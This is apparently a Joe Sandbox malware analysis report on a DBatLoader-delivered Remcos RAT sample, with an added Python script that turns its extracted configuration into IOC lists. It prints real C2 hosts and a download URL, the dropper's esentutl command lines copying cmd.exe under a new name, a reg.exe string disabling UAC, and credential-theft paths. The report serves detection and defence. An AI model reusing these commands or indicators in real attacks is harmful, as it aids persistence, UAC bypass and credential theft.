
Windows Analysis Report
XjPA2pnUhC.exe

Overview

General Information

Sample name: XjPA2pnUhC.exe (renamed because the original name is a hash value)
Original sample name: bbf710c83246092a538128620853d4fd.exe
Analysis ID: 1517948
MD5: bbf710c83246092a538128620853d4fd
SHA1: 95338f06c76178de31b5e8453f92c43f970ea9f9
SHA256: 7ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
Tags: exe, user-abuse_ch

Detection

Remcos, DBatLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Creation with Colorcpl
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • XjPA2pnUhC.exe (PID: 2780 cmdline: "C:\Users\user\Desktop\XjPA2pnUhC.exe" MD5: BBF710C83246092A538128620853D4FD)
    • cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7120 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 2860 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 2684 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
    • Qzzgbhha.PIF (PID: 6388 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
      • SndVol.exe (PID: 1200 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Qzzgbhha.PIF (PID: 2000 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
    • SndVol.exe (PID: 1520 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • cleanup
Name: Remcos (RemcosRAT)
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

DBatLoader configuration: {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
Remcos configuration: {"Host:Port:Password": "apostlejob2.duckdns.org:2468:1192.161.184.44:2468:1", "Assigned name": "Exploit001", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OGO4HJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
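Added here as a worked example (not Joe Sandbox, Remcos or DBatLoader code): a Python pass that turns the two extracted configurations above into a flat IOC set. The input dicts are copied from the report, trimmed to the fields used. One labelled assumption: the glued "Host:Port:Password" value is several host:port:flag entries run together, each ending in a single-digit third field (the extractor labels it "Password"), so the string is cut after every such digit. That reading is consistent with the DNS query to apostlejob2.duckdns.org and the Suricata C2 alert to 192.161.184.44:2468 elsewhere in this report. The dynamic-DNS suffix list is a short assumed sample, not a complete one.

```python
"""IOC normalisation for the DBatLoader and Remcos configurations in this report.

Added example, not Joe Sandbox or malware-author code. DBATLOADER_CFG and
REMCOS_CFG are copied from the report's configuration-extractor output
(trimmed). Assumption: the glued C2 string is host:port:flag entries run
together, each flag being exactly one digit.
"""
import ipaddress
import re
from urllib.parse import urlparse

DBATLOADER_CFG = {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
REMCOS_CFG = {
    "Host:Port:Password": "apostlejob2.duckdns.org:2468:1192.161.184.44:2468:1",
    "Assigned name": "Exploit001",
    "Mutex": "Rmc-OGO4HJ",
    "Copy file": "remcos.exe",
    "Keylog file": "logs.dat",
}

# One entry = host, port, one-digit flag (assumption, see module docstring).
_C2_ENTRY = re.compile(r"(?P<host>[A-Za-z0-9.\-]+):(?P<port>\d{1,5}):(?P<flag>\d)")

# Assumed sample of dynamic-DNS suffixes abused for C2; extend for real use.
DYNAMIC_DNS = (".duckdns.org", ".no-ip.com", ".ddns.net", ".hopto.org")


def split_c2(value: str) -> list:
    """Cut the glued Remcos C2 string into entries; fail loudly on junk."""
    entries, pos = [], 0
    while pos < len(value):
        m = _C2_ENTRY.match(value, pos)
        if m is None:
            raise ValueError(f"unparseable C2 data at offset {pos}: {value[pos:]!r}")
        entries.append({"host": m["host"], "port": int(m["port"]), "flag": m["flag"]})
        pos = m.end()
    return entries


def _is_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def iocs(dbat: dict, remcos: dict) -> dict:
    """Flatten both configurations into de-duplicated, sorted IOC lists."""
    urls = list(dbat.get("Download Url", []))
    c2 = split_c2(remcos["Host:Port:Password"])
    hosts = [h for h in (urlparse(u).hostname for u in urls) if h]
    hosts += [e["host"] for e in c2]
    return {
        "urls": sorted(set(urls)),
        "c2": sorted({f"{e['host']}:{e['port']}" for e in c2}),
        "ips": sorted({h for h in hosts if _is_ip(h)}),
        "domains": sorted({h for h in hosts if not _is_ip(h)}),
        "dynamic_dns": sorted({h for h in hosts if h.endswith(DYNAMIC_DNS)}),
        "mutex": remcos.get("Mutex"),
        "files": sorted({remcos[k] for k in ("Copy file", "Keylog file") if k in remcos}),
    }


if __name__ == "__main__":
    for key, val in iocs(DBATLOADER_CFG, REMCOS_CFG).items():
        print(f"{key:12} {val}")
```

The splitter raises on anything it cannot parse instead of silently dropping a C2, which is the failure mode you want when the output feeds blocklists.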
Yara matches (dropped files)
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara matches (memory dumps)
Source | Rule | Description | Author
00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(42 further entries)

Yara matches (unpacked PEs)
Source | Rule | Description | Author | Strings
10.2.SndVol.exe.2880000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
10.2.SndVol.exe.2880000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
10.2.SndVol.exe.2880000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
10.2.SndVol.exe.2880000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
10.2.SndVol.exe.2880000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
(38 further entries)

                    System Summary

Source: File created | Author: frack113, Nasreddine Bencherchali | Data: EventID: 11, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 2000, ProcessName: Qzzgbhha.PIF
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2684, TargetFilename: C:\Users\user
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 2000, ProcessName: Qzzgbhha.PIF

                    Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2684, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T09:34:42.731337+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 192.161.184.44 | 2468 | TCP
2024-09-25T09:34:43.932990+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 178.237.33.50 | 80 | TCP

AV Detection

Source: apostlejob2.duckdns.org | Avira URL Cloud: Label: malware
Source: XjPA2pnUhC.exe | Malware Configuration Extractor: DBatLoader {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
Source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "apostlejob2.duckdns.org:2468:1192.161.184.44:2468:1", "Assigned name": "Exploit001", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OGO4HJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | ReversingLabs: Detection: 31%
Source: XjPA2pnUhC.exe | ReversingLabs: Detection: 31%
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\Public\Libraries\Qzzgbhha.PIF | Joe Sandbox ML: detected
Source: XjPA2pnUhC.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FC38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028B38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_030338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
Source: XjPA2pnUhC.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR

                    Privilege Escalation

The three CoGetObject call sites below are the code behind the "Contains functionality to bypass UAC (CMSTPLUA)" signature: CoGetObject is the API through which that bypass instantiates the CMSTPLUA COM object via an elevation moniker.
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F97538 _wcslen,CoGetObject
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02887538 _wcslen,CoGetObject
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_03007538 _wcslen,CoGetObject
Source: XjPA2pnUhC.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
                    Source: Binary string: easinvoker.pdbH source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E621000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E650000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
Source: C:\Users\user\Desktop\XjPA2pnUhC.exe | Code function: 0_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FAC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F996A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FA9B86 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02FDE8F9 FindFirstFileExA
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F97877 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F98847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 7_2_02F9BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0289C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02899B86 FindFirstFileW,FindNextFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_028CE8F9 FindFirstFileExA
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02888847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_02887877 FindFirstFileW,FindNextFileW
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 10_2_0288BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0301C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 12_2_0300C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
